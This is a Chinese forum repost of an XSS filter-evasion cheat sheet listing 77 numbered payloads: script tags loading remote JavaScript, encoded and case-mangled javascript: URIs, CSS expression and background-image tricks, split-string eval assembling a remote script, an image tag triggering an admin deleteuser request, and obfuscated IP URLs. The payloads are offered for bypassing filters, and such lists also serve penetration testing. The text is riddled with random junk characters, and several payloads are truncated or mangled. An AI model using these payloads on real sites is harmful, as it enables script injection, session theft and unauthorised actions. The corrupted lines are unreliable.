貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
7 \4 N& l, O- V$ d5 J8 S" p7 A' M) t8 S4 ^
(1)普通的XSS JavaScript注入& |) u9 {% A$ v
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>' ~0 ^) D0 G G3 a1 D" E, ]
5 [$ O G# q5 R2 ]
(2)IMG标签XSS使用JavaScript命令7 T2 I' V$ H% t2 _ O
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>* x- K" Z4 A2 s
* ? S0 U) p% |( y# [ (3)IMG标签无分号无引号: u3 ^" C6 T5 r" ?( L& T8 d) y6 b3 i
<IMG SRC=javascript:alert(‘XSS’)>' q5 Q0 v5 P9 h2 y2 l
- x# \9 A7 Z1 J+ h3 Z* `1 G4 c (4)IMG标签大小写不敏感* O- ?& W! ?+ o" q. F5 @* A
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
' {4 b3 N( m t1 s5 f( D5 |* O0 a: A' _) K# ]$ I
(5)HTML编码(必须有分号)
' N4 F* x3 U9 O' N& n* G6 L/ U: H <IMG SRC=javascript:alert(“XSS”)>3 ?* W" E( i6 ~: `
: A# Z- b3 m* U
(6)修正缺陷IMG标签
& o1 Z3 b- B( r& ]! \9 z <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
7 G7 f4 {& {0 Z' S, H: ^" F' n0 D! C! a# V- l+ M* J6 U
(7)formCharCode标签(计算器)
" _! z$ Y! t0 g+ ~1 k9 ]( q0 V <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> D, E) w* t4 g2 Z! f
& J4 r$ b8 J! _; o (8)UTF-8的Unicode编码(计算器)2 {( d$ t" x0 a4 ]. f B
<IMG SRC=jav..省略..S')>. d3 d' G. c5 Q, n8 V
: \) b: C* P! N l (9)7位的UTF-8的Unicode编码是没有分号的(计算器)6 F7 C0 D+ l2 {; U# H1 h; S
<IMG SRC=jav..省略..S')> R& K8 v! \ L$ l' b
" v9 W! W4 l6 S; D6 y: x (10)十六进制编码也是没有分号(计算器)
/ T( S( R2 [6 S6 a# D <IMG SRC=java..省略..XSS')>$ i3 Y# [# j- y" }% v C" R
! i# }; t* C [3 {2 ~% O (11)嵌入式标签,将Javascript分开
) A' ]6 R5 T( m4 k# w# I <IMG SRC=”jav ascript:alert(‘XSS’);”>% e4 Y" T1 u- e' l( v+ B
: i1 D L% S- J* g& l (12)嵌入式编码标签,将Javascript分开
: w1 J# |" H2 U1 B! y <IMG SRC=”jav ascript:alert(‘XSS’);”>, G1 M. c5 h. g. Q
1 C" H- J/ E# U- {6 T
(13)嵌入式换行符& ~$ i6 I+ b% h: b, E7 e
<IMG SRC=”jav ascript:alert(‘XSS’);”>" Y7 s8 v. B% P
; L0 O" L" g. ]9 p
(14)嵌入式回车" d8 ?- ]+ n# \5 }
<IMG SRC=”jav ascript:alert(‘XSS’);”>, r# I5 x# Z. A9 F
& }7 G7 H- E3 A, ~! F
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
$ Y" t' M6 x2 C, @ <IMG SRC=”javascript:alert(‘XSS‘)”>
/ F5 @4 u% @ j# b9 S- M7 E6 o |& p* \ b0 R
(16)解决限制字符(要求同页面)
+ C- S2 Q N4 V6 t <script>z=’document.’</script>
3 x& B5 l q/ Y! P" W- d8 o+ S' b <script>z=z+’write(“‘</script>
0 |6 G% Y% V1 [7 ? [2 z <script>z=z+’<script’</script>
( A& n/ O/ ~- m; t <script>z=z+’ src=ht’</script>- Y" u6 Q' j; a+ L8 F2 e
<script>z=z+’tp://ww’</script>& k7 l1 ^$ {) t8 T9 e# l
<script>z=z+’w.shell’</script>- u% h0 o' n, n* N
<script>z=z+’.net/1.’</script>$ T4 F f4 Q3 T
<script>z=z+’js></sc’</script>. c2 X$ ]# x" `) E. [) M4 u6 W
<script>z=z+’ript>”)’</script>' F+ D* O0 V7 D& a
<script>eval_r(z)</script>! h& {& U' c0 N) r0 o2 I8 C
' X) x" h2 K; g, q
(17)空字符
% c6 X3 e& E( d5 C5 ]" e perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
/ w0 l" H k5 l% M4 R' N5 O3 v5 V6 A, @7 [3 R2 X1 _
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用" N& r( D2 {( ?/ m$ N/ j
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out3 v" c# G1 V M/ d
( y7 @7 X, w8 b (19)Spaces和meta前的IMG标签# o" I1 x4 A ~) s
<IMG SRC=” javascript:alert(‘XSS’);”>
/ G! b0 n8 p1 }0 L4 O3 G0 T2 Z: ]" g: Z! }" o. m$ Z4 v
(20)Non-alpha-non-digit XSS( l# f2 Z7 W- U5 c1 d* q3 P) y) y
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
7 k- f8 l1 y8 N
4 c* S% c% F- e/ b' |; U& k (21)Non-alpha-non-digit XSS to 2" q3 Y0 X/ Q# m
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
+ V" ?' Y; G" T( P' C: \% x% k" ?0 s4 N2 W
(22)Non-alpha-non-digit XSS to 3
, T4 _! h. C+ y. l" m' ^# M h! f4 ] <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>% F, U" b1 {9 Y* G
$ N G% R9 r3 t (23)双开括号$ |2 N" `1 L. }2 U! `- `
<<SCRIPT>alert(“XSS”);//<</SCRIPT>4 Q$ c H; {: {) \2 G0 |# G( b
0 N+ N& V& Z1 r% [
(24)无结束脚本标记(仅火狐等浏览器)
% k! K8 }# C9 b S" r- F/ s <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>2 s/ n5 l5 d( {" z6 K
6 E5 g$ ?1 b4 P! U
(25)无结束脚本标记21 _9 I" s% w& z% [3 N0 B3 l
<SCRIPT SRC=//3w.org/XSS/xss.js>5 Y9 m" G/ ~$ v) e @' G! I
0 Q1 i( Y* b- Q7 @0 v* o: d" S: Y4 j
(26)半开的HTML/JavaScript XSS
& e, C% J) {" d" v <IMG SRC=”javascript:alert(‘XSS’)”
2 p6 o7 R" F' `0 A1 ]7 d0 s1 B7 Q' Z* i. h: f% h" R4 x; U5 q
(27)双开角括号
) T* U; ^- p1 W4 z2 b <iframe src=http://3w.org/XSS.html <9 ~6 C$ X& r; d( k$ u
3 ?) r" T, j; p (28)无单引号 双引号 分号- x8 r6 l: A. f7 f/ o
<SCRIPT>a=/XSS/
/ `4 {8 O5 F+ _9 b; r+ O- ?' ^ I alert(a.source)</SCRIPT>0 X: K2 z( }& E8 `9 H4 W2 g8 y/ @, h
- p0 |9 X E8 S, ^! `
(29)换码过滤的JavaScript
' Q7 z6 S/ q1 N% G3 u0 ?) S+ ] \”;alert(‘XSS’);//
5 ^) ^+ T' M0 ?" h* X9 ?0 H, j
) d# n( I; H3 v: g* N d# u( w (30)结束Title标签 _: c' A4 @9 N/ r3 G& h/ [
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>6 T+ ~' N* l9 Z2 {2 ~( Q* R
$ r3 r9 _( M. r+ l- Q (31)Input Image
, @( H3 w9 G6 { C# ?1 e9 }! b <INPUT SRC=”javascript:alert(‘XSS’);”>3 B5 j: y1 ^* P. y; N) J& H3 ^: W
0 ~: w$ j8 w! ?, s% c) G ^7 O
(32)BODY Image0 X& Z' {. l+ m
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
3 p& K2 c6 j+ x2 m
] {5 J% |# d! \: z+ M: r (33)BODY标签
. t+ {! I! H* h" l7 ~* Q: b' s <BODY(‘XSS’)>5 T# m8 ]* p8 j3 Q; i3 P
) w) M7 F$ W8 U
(34)IMG Dynsrc
# x: w/ y; l/ b# h0 r <IMG DYNSRC=”javascript:alert(‘XSS’)”>* z- d2 F8 A$ p$ t1 Y
' ?4 B8 W. d' H6 C (35)IMG Lowsrc% ~6 d: W* C E1 P4 }0 M
<IMG LOWSRC=”javascript:alert(‘XSS’)”> f1 b9 ` _) P2 u# c# F
% z; ]" l. R6 Q4 d& U( E
(36)BGSOUND
0 u H- g) [0 c& p3 q+ ~8 x4 X <BGSOUND SRC=”javascript:alert(‘XSS’);”>. ~+ d9 m; M+ G# x! P+ o3 V, U
! B+ x" p4 o* Z7 A5 O3 c (37)STYLE sheet. l7 i$ g1 ^. I+ Z* ~1 [2 O2 G: u
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
& ^' k @. Z3 X' m. L
# Q" H) W$ N# m! U8 w7 E5 E# l (38)远程样式表
) s. o5 b: V0 Z1 P: h; y6 f5 m7 w <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
, Y6 v; }& ?+ G. A3 v" ?
. |3 a, P7 i* w/ D1 f" F+ T (39)List-style-image(列表式)
: G! R/ h, B5 t( M6 k( O <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
3 k+ B* u7 l& N# A4 C8 K z
; A) j( v" t- W# I/ V# { (40)IMG VBscript8 d5 S$ Q% o( c" f: }3 ^
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS1 S9 e5 d: F5 O- E8 G# b, t
* I9 A7 [" d$ Y- V5 I& N. U
(41)META链接url
6 i9 x1 ~% \- m* | <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
+ S* D0 b i: J$ O$ c: ^! t; ]
6 {) M5 w! o+ X (42)Iframe
4 \* u$ b! D4 I <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>+ r4 o' k o- K! v" Q
3 L& O; X* k+ e% z5 T
(43)Frame/ @& o" Y6 O9 T, k0 V& J7 `) {9 F
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
; r* e! E: b5 S, g- ]% Y) [5 Y6 f+ I' K1 a" Q2 j4 q2 X3 u
(44)Table
( \- j: _. c$ ~% `( Z <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
9 H) l5 l, G( [* m; A ?3 F4 S" v( p. J& |8 ] W: _5 q
(45)TD, E, r, D M* n6 c# x1 Y$ U ^) g
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>$ z1 e0 z4 j* F5 D" y! J
' i& W0 Q# n% k2 C) B/ g (46)DIV background-image F) R: a2 ]1 H) c0 f1 j+ m
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
2 r9 W& }/ c" ]& v/ ~0 g2 Q% s% }) b
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279). O+ D+ v# O9 @; i6 X) o7 D1 E
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>1 z9 P7 E N# L0 b% A
+ c% m& O/ D% p2 _
(48)DIV expression
) z7 l$ Q# a5 R2 Q4 l1 S& k <DIV STYLE=”width: expression_r(alert(‘XSS’));”>$ a2 `8 ^. w" g2 w5 C' X
1 z8 Q, X; u7 V G& s3 D$ O (49)STYLE属性分拆表达
$ \5 S1 I7 E, i, ? <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
0 x. j. w8 Z3 N* V6 U
/ i0 n( _8 s- m% ^ (50)匿名STYLE(组成:开角号和一个字母开头)7 T; b+ n: n; b$ u- D* B+ i1 Y* ]
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>- u, A3 G) d5 I, a
" x4 F, M8 K$ [7 m
(51)STYLE background-image0 v5 Z- }) o ?2 W. Z, G; j
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
8 Z; S, A2 V( \% F- @" z" W: F% j3 a6 J5 [6 U, \1 k2 b
(52)IMG STYLE方式
) [; a! L8 ?6 ~) g1 X2 ? exppression(alert(“XSS”))’>
' t% V- K4 r8 ~! Q+ T0 V( S! j% P( |, i) S9 Q
(53)STYLE background
5 A/ [3 m) |1 a* [7 F <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
5 f' e, G# `6 Z8 ~
9 W+ l. `. |, L7 k8 n2 R (54)BASE5 ? m7 T- U) J3 f8 J
<BASE HREF=”javascript:alert(‘XSS’);//”>
( R' t) j9 s$ F- a2 f4 N( |% _+ X# j6 P% j1 X# _* d
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS% d4 P# V3 w2 }4 c/ @: Q
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>) z! t. V# g' a, ]
3 [ v z- ~ r0 P; [7 H) e; _
(56)在flash中使用ActionScrpt可以混进你XSS的代码
: I" w+ {" H4 l+ }4 ^ a=”get”;1 ^& c9 m$ X3 k i1 _7 M; F
b=”URL(\”";
2 R/ |/ Y" b, k c=”javascript:”;( w- y3 O S( P B3 R' c; v
d=”alert(‘XSS’);\”)”;& F9 y7 m+ S$ b/ t1 m; o
eval_r(a+b+c+d);$ U; n2 ?- V; A G! L1 R) p- P) {
8 c/ y& K5 J) t: G
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上7 y+ j' B) e4 I& F) b: X
<HTML xmlns:xss>
! {$ ?: k6 M' g4 w <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
; j- Q* q& R6 I ] w <xss:xss>XSS</xss:xss>
. j' D; t- m- M/ ^- J# v </HTML>
: C$ _9 l5 T6 O
8 Y6 k( Q5 d* j- |4 a (58)如果过滤了你的JS你可以在图片里添加JS代码来利用
0 X3 v5 `, x$ G( r <SCRIPT SRC=””></SCRIPT>; {0 X. P. D; k
! h: b. J8 {( H0 b1 \4 z/ | (59)IMG嵌入式命令,可执行任意命令
/ s l* }) i: Q# P0 W5 x <IMG SRC=”http://www.XXX.com/a.php?a=b”>' Y5 C' z3 @3 g0 F# Q: C2 a! i
1 J6 y" ^: o$ ^! |# I
(60)IMG嵌入式命令(a.jpg在同服务器)7 V! @3 T- b7 h+ v: w2 x
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
2 L( x- H" i' T
4 B& Z$ x/ p( I+ r- K (61)绕符号过滤
# t9 Y$ u$ n# ] <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>! G/ R( q) ]+ P Z% Z" }
! @+ r/ O* E2 d# l0 m7 I& \9 g' l (62)
) `% l- [3 f) L4 g' g <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
1 D6 l3 P! T; k+ S) h" |$ B3 x/ {* `/ w ~: C0 P' Q- M/ r
(63)% Z, D) i) ~( Z( s4 S
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
/ P9 x( B( D u# U" F6 L6 F; u" k" B
(64)+ Y) `( u0 D" g0 ]% i
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>0 h. o0 t7 }* R
" Y6 x/ A) R% G F1 R" g (65)
4 G! p, R* Z( y9 I c U <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
5 w' ]4 R9 c; K) \4 K% h+ b* ~" B8 I
(66), \0 q9 @0 p0 _" V) A/ j
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
1 a9 C& @. z' j" I9 ~4 H& `: H
) {* X- j! B/ ?: B' a (67)- \1 c4 {' N3 X6 H) o/ x% {
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
6 v: s( q4 {* h2 J
+ ^9 a1 @0 s& N. w. }" T (68)URL绕行
& G; w0 X0 e( ]# } <A HREF=”http://127.0.0.1/”>XSS</A>+ {* w- \) h2 V, v( O: K3 ]0 m
! n# v( ]2 C8 S1 t (69)URL编码7 F9 W; t c5 S# @3 G; [: t+ y* |
<A HREF=”http://3w.org”>XSS</A>3 d; A) _% O9 s5 g6 H2 q& p
: l; u2 D+ \1 h( ^4 a; G# y: d (70)IP十进制) j4 l- ~5 b- K) u; J2 _# V* b
<A HREF=”http://3232235521″>XSS</A>+ ]5 q ?1 g! t) z
- }4 W ]* _. o$ j7 |
(71)IP十六进制
' t4 _$ f6 S3 z: }% ?5 v <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
! A4 K0 s; o/ B6 g% R
, P/ ]. `' r- ^# D* Y; G3 q& h: W- A (72)IP八进制- J- Y6 f8 L% Y% T" a' A
<A HREF=”http://0300.0250.0000.0001″>XSS</A>5 s( F1 b% P" [! c- X
8 D; [5 Z2 w& M; c6 ] (73)混合编码6 [& a% b6 G! A1 o( j
<A HREF=”h$ Z' { S# e, Q: `0 g/ N) F1 s! }! u
tt p://6 6.000146.0×7.147/”">XSS</A>5 D1 D) q# b; k2 g1 O' E8 m
5 [% Y/ Y& _! |: M (74)节省[http:]
* v- {4 } l$ W# O <A HREF=”//www.google.com/”>XSS</A>. W3 ?6 v7 v. T9 L
" a& A$ l5 P7 G (75)节省[www]) g' k' ^, y: \* R! a! t( q ?
<A HREF=”http://google.com/”>XSS</A>" Z; Y+ B1 |. ]
# }! G! [7 @8 U1 P! ^5 r- } (76)绝对点绝对DNS' \% b: ^9 |. A/ r* }( p7 o
<A HREF=”http://www.google.com./”>XSS</A>
l& x/ r- ?( ~9 o8 @; O' r" `6 ~* D, X" g( F/ C3 Y5 B1 ^
(77)javascript链接
/ I/ Z: n8 Q$ H1 L <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |